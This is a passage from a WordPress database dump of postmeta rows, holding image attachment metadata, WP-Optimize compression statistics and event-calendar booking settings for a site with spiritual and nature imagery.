WP-Optimize'),(81505,254595,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19005;s:12:\"smushed-size\";i:18549;s:15:\"savings-percent\";d:2.4;}'),(85841,258359,'_wp_attached_file','2020/02/shariyat-ki-sugmad-book-1.jpg'),(85842,258359,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:148;s:6:\"height\";i:217;s:4:\"file\";s:37:\"2020/02/shariyat-ki-sugmad-book-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"shariyat-ki-sugmad-book-1-148x150.jpg\";s:5:\"width\";i:148;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:35:\"shariyat-ki-sugmad-book-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:37:\"shariyat-ki-sugmad-book-1-123x180.jpg\";s:5:\"width\";i:123;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:37:\"shariyat-ki-sugmad-book-1-148x150.jpg\";s:5:\"width\";i:148;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(81510,253344,'original-file','2020/01/ocean-bkgrnd-homepg-updraft-pre-smush-original.jpg'),(81511,253344,'smush-complete','1'),(81512,253344,'smush-info','The file was compressed from 122.70 KB to 105.62 KB saving 13.92 percent using WP-Optimize'),(81513,253344,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:125645;s:12:\"smushed-size\";i:108153;s:15:\"savings-percent\";d:13.92;}'),(81514,243613,'original-file','2020/01/co-EK-BGrid-logo-title-image-4-updraft-pre-smush-original.png'),(81515,243613,'smush-complete','1'),(81516,243613,'smush-info','The file was compressed from 9.67 KB to 4.68 KB saving 51.56 percent using WP-Optimize'),(81517,243613,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:9903;s:12:\"smushed-size\";i:4797;s:15:\"savings-percent\";d:51.56;}'),(81518,230895,'original-file','2019/12/co-EK-BGrid-logo-title-image-lg-3-updraft-pre-smush-original.png'),(81519,230895,'smush-complete','1'),(81520,230895,'smush-info','The file was compressed from 11.04 KB to 5.17 KB saving 53.23 percent using WP-Optimize'),(81521,230895,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:11308;s:12:\"smushed-size\";i:5289;s:15:\"savings-percent\";d:53.23;}'),(81522,198979,'original-file','2019/10/wooden-bridge-updraft-pre-smush-original.jpg'),(81523,198979,'smush-complete','1'),(81524,198979,'smush-info','The file was compressed from 41.91 KB to 38.68 KB saving 7.72 percent using WP-Optimize'),(81525,198979,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:42920;s:12:\"smushed-size\";i:39608;s:15:\"savings-percent\";d:7.72;}'),(82270,256908,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:28737;s:12:\"smushed-size\";i:27121;s:15:\"savings-percent\";d:5.62;}'),(82268,256908,'smush-complete','1'),(82269,256908,'smush-info','The file was compressed from 28.06 KB to 26.49 KB saving 5.62 percent using WP-Optimize'),(81530,174942,'original-file','2019/10/harold-intro-Bg-4-updraft-pre-smush-original.jpg'),(81531,174942,'smush-complete','1'),(81532,174942,'smush-info','The file was compressed from 27.95 KB to 26.65 KB saving 4.67 percent using WP-Optimize'),(81533,174942,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:28622;s:12:\"smushed-size\";i:27286;s:15:\"savings-percent\";d:4.67;}'),(81534,152442,'original-file','2019/09/harold-eck-masters-page-frame-1-updraft-pre-smush-original.jpg'),(81535,152442,'smush-complete','1'),(81536,152442,'smush-info','The file was compressed from 31.11 KB to 29.73 KB saving 4.42 percent using WP-Optimize'),(81537,152442,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:31856;s:12:\"smushed-size\";i:30448;s:15:\"savings-percent\";d:4.42;}'),(81538,138261,'original-file','2019/09/harold-intro-updraft-pre-smush-original.jpg'),(81539,138261,'smush-complete','1'),(81540,138261,'smush-info','The file was compressed from 20.88 KB to 20.63 KB saving 1.19 percent using WP-Optimize'),(81541,138261,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21377;s:12:\"smushed-size\";i:21123;s:15:\"savings-percent\";d:1.19;}'),(81542,65663,'original-file','2019/07/newsletter-gpx-sm-1-updraft-pre-smush-original.png'),(81543,65663,'smush-complete','1'),(81544,65663,'smush-info','The file was compressed from 12.49 KB to 6.04 KB saving 51.66 percent using WP-Optimize'),(81545,65663,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12789;s:12:\"smushed-size\";i:6182;s:15:\"savings-percent\";d:51.66;}'),(144926,265274,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:10800;s:12:\"smushed-size\";i:4730;s:15:\"savings-percent\";d:56.2000000000000028421709430404007434844970703125;}'),(144925,265274,'smush-info','The file was compressed from 10.55 KB to 4.62 KB saving 56.2 percent using WP-Optimize'),(144923,265274,'original-file','2021/08/footer-8-12-2021-2-updraft-pre-smush-original.png'),(144924,265274,'smush-complete','1'),(81654,254595,'_edit_lock','1579642079:2'),(86148,258547,'_field_134','garcia'),(90305,81469,'original-file','2019/08/moon-river-updraft-pre-smush-original.jpg'),(188296,268838,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(188293,268838,'mec_in_days',''),(188294,268838,'mec_not_in_days',''),(188295,268838,'mec_hourly_schedules','a:0:{}'),(188287,268838,'mec_repeat_type',''),(188288,268838,'mec_repeat_interval','1'),(188289,268838,'mec_repeat_end',''),(188286,268838,'mec_repeat_status','0'),(188285,268838,'mec_end_day_seconds','52200'),(188281,268838,'mec_end_date','2023-08-23'),(188282,268838,'mec_end_time_hour','2'),(188283,268838,'mec_end_time_minutes','30'),(188284,268838,'mec_end_time_ampm','PM'),(188015,268800,'_wp_attached_file','2023/07/RESA-Org-Chart-5.13.23.pdf'),(188016,268800,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:30:\"RESA-Org-Chart-5.13.23-pdf.jpg\";s:5:\"width\";i:2176;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197971;}s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"RESA-Org-Chart-5.13.23-pdf-303x196.jpg\";s:5:\"width\";i:303;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11685;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"RESA-Org-Chart-5.13.23-pdf-1024x663.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:663;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68856;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"RESA-Org-Chart-5.13.23-pdf-150x97.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:97;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5512;}}s:8:\"filesize\";i:101488;}'),(150950,265939,'original-file','2021/11/podcast-bk-2-updraft-pre-smush-original.jpg'),(150951,265939,'smush-complete','1'),(150952,265939,'smush-info','The file was compressed from 125.66 KB to 118.75 KB saving 5.5 percent using WP-Optimize'),(150953,265939,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:128675;s:12:\"smushed-size\";i:121600;s:15:\"savings-percent\";d:5.5;}'),(188290,268838,'mec_repeat_end_at_occurrences',''),(188291,268838,'mec_repeat_end_at_date',''),(188292,268838,'mec_advanced_days','a:0:{}'),(82407,257041,'_wp_attached_file','2020/01/harold-bg-tabs-H.jpg'),(82214,256899,'_wp_attached_file','2020/01/blubutterfly-orange-flower.jpg'),(82215,256899,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:365;s:6:\"height\";i:217;s:4:\"file\";s:38:\"2020/01/blubutterfly-orange-flower.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"blubutterfly-orange-flower-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"blubutterfly-orange-flower-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"blubutterfly-orange-flower-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:38:\"blubutterfly-orange-flower-300x217.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:38:\"blubutterfly-orange-flower-250x149.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:38:\"blubutterfly-orange-flower-303x180.jpg\";s:5:\"width\";i:303;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"blubutterfly-orange-flower-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82216,256900,'_wp_attached_file','2020/01/bluerocks-butterfly.jpg'),(82217,256900,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:213;s:4:\"file\";s:31:\"2020/01/bluerocks-butterfly.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"bluerocks-butterfly-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"bluerocks-butterfly-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:29:\"bluerocks-butterfly-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:31:\"bluerocks-butterfly-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:31:\"bluerocks-butterfly-250x145.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:31:\"bluerocks-butterfly-309x180.jpg\";s:5:\"width\";i:309;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:31:\"bluerocks-butterfly-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82218,256901,'_wp_attached_file','2020/01/girl-tree-island.jpg'),(82219,256901,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:217;s:4:\"file\";s:28:\"2020/01/girl-tree-island.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"girl-tree-island-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"girl-tree-island-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"girl-tree-island-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:28:\"girl-tree-island-300x217.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:28:\"girl-tree-island-250x148.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"girl-tree-island-304x180.jpg\";s:5:\"width\";i:304;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"girl-tree-island-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82220,256902,'_wp_attached_file','2020/01/pink-flower-beach.jpg'),(82221,256902,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:216;s:4:\"file\";s:29:\"2020/01/pink-flower-beach.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"pink-flower-beach-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"pink-flower-beach-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:27:\"pink-flower-beach-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:29:\"pink-flower-beach-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:29:\"pink-flower-beach-250x148.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:29:\"pink-flower-beach-305x180.jpg\";s:5:\"width\";i:305;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:29:\"pink-flower-beach-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82222,256903,'_wp_attached_file','2020/01/purple-butterfly.jpg'),(82223,256903,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:216;s:4:\"file\";s:28:\"2020/01/purple-butterfly.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"purple-butterfly-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"purple-butterfly-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"purple-butterfly-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:28:\"purple-butterfly-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:28:\"purple-butterfly-250x148.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"purple-butterfly-305x180.jpg\";s:5:\"width\";i:305;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"purple-butterfly-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82224,256904,'_wp_attached_file','2020/01/rocks-in-clear-stream.jpg'),(82225,256904,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:204;s:4:\"file\";s:33:\"2020/01/rocks-in-clear-stream.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"rocks-in-clear-stream-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"rocks-in-clear-stream-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:31:\"rocks-in-clear-stream-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:33:\"rocks-in-clear-stream-300x204.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:33:\"rocks-in-clear-stream-250x139.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:33:\"rocks-in-clear-stream-323x180.jpg\";s:5:\"width\";i:323;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:33:\"rocks-in-clear-stream-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82226,256905,'_wp_attached_file','2020/01/rocks-sea-1.jpg'),(82227,256905,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:206;s:4:\"file\";s:23:\"2020/01/rocks-sea-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"rocks-sea-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"rocks-sea-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:21:\"rocks-sea-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:23:\"rocks-sea-1-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:23:\"rocks-sea-1-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:23:\"rocks-sea-1-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:23:\"rocks-sea-1-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82228,256906,'_wp_attached_file','2020/01/stacked-rocks.jpg'),(82229,256906,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:365;s:6:\"height\";i:206;s:4:\"file\";s:25:\"2020/01/stacked-rocks.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"stacked-rocks-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"stacked-rocks-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"stacked-rocks-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:25:\"stacked-rocks-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:25:\"stacked-rocks-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"stacked-rocks-319x180.jpg\";s:5:\"width\";i:319;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"stacked-rocks-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82230,256907,'_wp_attached_file','2020/01/tulips-1.jpg'),(82231,256907,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:215;s:4:\"file\";s:20:\"2020/01/tulips-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"tulips-1-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"tulips-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:18:\"tulips-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:20:\"tulips-1-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:20:\"tulips-1-250x147.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:20:\"tulips-1-306x180.jpg\";s:5:\"width\";i:306;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:20:\"tulips-1-210x150.jpg\";s:5:\"w